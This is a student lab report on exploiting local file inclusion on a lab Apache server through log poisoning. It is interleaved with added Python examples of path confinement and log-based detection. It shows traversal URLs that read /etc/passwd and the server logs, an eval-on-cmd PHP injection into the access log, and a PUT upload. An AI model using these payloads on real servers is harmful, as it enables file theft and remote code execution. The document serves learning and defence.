LFI vulnerability


  • 8/15/2019 LFI vulnerability


    Objective

Demonstrate and exploit the LFI vulnerability on an Apache server through Apache log injection.

Methods

The first thing to do is verify whether the Apache server that is the target of the attack is vulnerable. To check this we send a directory traversal request: in the URL of the web application hosted on the server we append the path /etc/passwd at the end of the string, like this:

    http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00 

The result of sending this URL is shown below:

Figure 1: Contents of /etc/passwd on the Apache server

The file we accessed contains the users and passwords managed by the Apache server we are attacking; it also lets us know the OS on which the server is installed, in this case FreeBSD.

Once we have verified that the vulnerability exists on the server, we proceed to find where the access log is located, because we are going to use an Apache log injection attack. For this we consult the default layouts of the distributions:

    http://wiki.apache.org/httpd/DistrosDefaultLayout 
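As a defender's counterpart to the check above, here is an added example (not code from the lab or from the exercise1.php application) of the confinement a file-inclusion parameter needs before it reaches include(). It is written in Python so it can be run here; the root directory and the allowed extensions are assumptions.

```python
import os

# Assumed for this example: the directory exercise1.php is allowed to include from
# and the extensions it may serve. Both are constructed, not taken from the lab server.
ALLOWED_ROOT = "/var/www/esime/lfi/pages"
ALLOWED_EXT = {".php", ".html", ".txt"}


def resolve_include(user_value, root=ALLOWED_ROOT):
    """Return the absolute path that the 'file' parameter may include, or None to refuse.

    These are the checks a bare include($_GET['file']) lacks:
    1. reject an embedded NUL (the decoded %00 that truncates the path in old PHP),
    2. normalise ../ sequences and refuse anything that leaves the root,
    3. allow only a fixed set of extensions, so log files and /etc/passwd
       can never be selected even if a traversal slipped through.
    """
    if not user_value or "\x00" in user_value:
        return None
    root_real = os.path.realpath(root)
    # Treat the value as relative to the root; a leading '/' must not escape it.
    candidate = os.path.realpath(os.path.join(root_real, user_value.lstrip("/")))
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    if os.path.splitext(candidate)[1] not in ALLOWED_EXT:
        return None
    return candidate
```

The traversal payloads from this report (with or without the %00) are refused by the first two checks, while an ordinary page name inside the root resolves normally.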



Another test we can do is to try to retrieve the server's error log; for this we send the following request:

    192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-error.log%00

Below we can see that we also obtain the error log of the Apache server.

Figure 4: Error log contents on the Apache server

Once we have found the server's logs, we proceed to inject PHP code into the server via a raw socket connection, in this case using Telnet. Once connected to the server we inject the PHP code shown below.

    GET / HTTP/1.1 

Where:

GET is used so that the data the server sends back as the answer to the request will be visible in the browser.

Eval evaluates a string as PHP code. The string must be valid PHP code and must end with a semicolon. In this case eval lets us execute the commands passed in "cmd" on the server.

CMD is the name of the variable that lets us send data through GET.

The process of connecting to the server and injecting the code is shown below.


Figure 5: Connection to the server and code injection

After the code injection we proceed to verify that it works correctly by sending the following URL:

    http://192.168.2.250/esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00 

The result of this request is shown below (the cmd window is only there to demonstrate that the request is sent from my IP):

Figure 6: phpinfo() output obtained via the LFI attack



Once we are able to send cmd requests we can obtain the UID, phpinfo, and the rc.conf data from the server; below I show the id output and the rc.conf data.

Figure 7: rc.conf data

Figure 8: Server UID

There are many ways to inject code, but most of them give the same result. One of them is to inject a .txt file via a raw socket using the PUT method; an example is shown below:

    telnet 192.168.116.134 80

    trying to connect 192.168.116.134 80

    PUT /file_name.txt HTTP/1.1


The content of the .txt file is the following PHP code:

The code lets us obtain the server info through Apache commands, as in the process I explained before.
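Both injection methods described above (the poisoned access-log line and the PUT upload) leave distinctive traces in the very log they abuse. The following added example, which is not part of the report, runs simple indicator checks over Apache combined-log lines modelled on this report's traffic; the sample lines, addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined log format, modelled on the requests this
# report describes. Addresses and timestamps are made up for the example.
SAMPLE_LOG = """\
192.168.2.10 - - [15/Aug/2019:10:01:02 +0000] "GET /esime/lfi/exercise1.php?file=page1.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.2.10 - - [15/Aug/2019:10:02:15 +0000] "GET /esime/lfi/exercise1.php?file=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.2.10 - - [15/Aug/2019:10:03:40 +0000] "GET / HTTP/1.1" 200 1024 "-" "<?php eval($_GET['cmd']); ?>"
192.168.2.10 - - [15/Aug/2019:10:04:01 +0000] "GET /esime/lfi/exercise1.php?file=../../../../../../../../../../../../var/log/httpd-access.log%00&cmd=phpinfo();%00 HTTP/1.1" 200 65536 "-" "Mozilla/5.0"
192.168.2.10 - - [15/Aug/2019:10:05:30 +0000] "PUT /file_name.txt HTTP/1.1" 201 0 "-" "-"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def classify(line):
    """Return the indicator names that fire on one combined-log line (empty if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable"]
    target = unquote(m.group("target"))  # decode %2e%2e%2f and %00 before matching
    hits = []
    if "../" in target or "..\\" in target:
        hits.append("traversal")
    if "\x00" in target:
        hits.append("null_byte")
    if re.search(r"/var/log/|/etc/passwd|\.log\b", target):
        hits.append("sensitive_file")
    if re.search(r"[?&]cmd=", target):
        hits.append("cmd_param")
    # A PHP tag or eval( in any logged field is the poisoning write itself.
    if any("<?" in f or "eval(" in f for f in (m.group("target"), m.group("referer"), m.group("ua"))):
        hits.append("php_in_request")
    if m.group("method") == "PUT":
        hits.append("put_upload")
    return hits


def scan(log_text):
    """Return (line_number, indicators) for every line that trips at least one check."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        hits = classify(line)
        if hits:
            findings.append((n, hits))
    return findings
```

Note that the poisoning line (line 3) looks like a harmless GET / until the User-Agent field is inspected, which is why the check covers every logged field and not only the request target.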

    Conclusions

The development of this exercise wasn't successful because I couldn't obtain a remote shell. Despite this, the knowledge obtained is very valuable, because from this attack a lot of attacks can be done and consequently prevented, allowing an improvement for the security student. Personally, I will continue with this exercise and I hope to achieve the full objective and share it with the teacher.